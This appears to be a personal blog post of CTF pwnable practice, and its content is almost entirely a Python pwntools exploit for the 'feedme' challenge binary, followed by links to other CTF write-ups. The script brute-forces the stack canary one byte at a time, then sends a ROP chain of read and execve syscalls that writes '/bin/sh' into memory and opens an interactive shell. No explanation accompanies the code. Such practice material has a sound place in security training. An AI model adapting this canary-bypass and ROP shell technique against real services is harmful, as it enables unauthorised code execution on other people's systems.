exploit.py
from pwn import *
p = process("./feedme")
e = ELF("./feedme")
canary = ""
p.recvuntil("FEED ME!\n")
for j in range(0,4):
for i in range(0,256):
payload = "A"*0x20+canary+chr(i)
p.send(chr(len(payload)))
p.send(payload)
result = p.recvuntil("FEED ME!\n")
if not "stack smashing detected" in result:
canary += chr(i)
print canary
break
print "Find Canary = " + canary
syscall = 0x0806fa1e
par = 0x080bb496
pcpbr = 0x0806f371
pdr = 0x0806f34a
bss = e.bss()
binsh = "/bin/sh\x00"
payload = "A"*0x20
payload += canary
payload += "A"*12
payload += p32(par)
payload += p32(0x3)
payload += p32(pcpbr)
payload += p32(bss)
payload += p32(0)
payload += p32(pdr)
payload += p32(len(binsh))
payload += p32(syscall)
payload += p32(par)
payload += p32(0xb)
payload += p32(pcpbr)
payload += p32(0)
payload += p32(bss)
payload += p32(pdr)
payload += p32(0)
payload += p32(syscall)
p.send(chr(len(payload)))
p.send(payload)
sleep(0.1)
p.send(binsh)
p.interactive()
'System > Pwnable Practice' 카테고리의 다른 글
| Codegate 2019 CTF aeiou (0) | 2019.07.30 |
|---|---|
| Codegate 2016 CTF Watermelon (0) | 2019.07.29 |
| SECCON CTF 2018 Classic (0) | 2019.07.28 |
| Defcon CTF 2015 r0pbaby (0) | 2019.07.28 |
| Pico CTF 2018 Can you gets me (0) | 2019.07.28 |
JeonYoungSin
메모 기록용 공간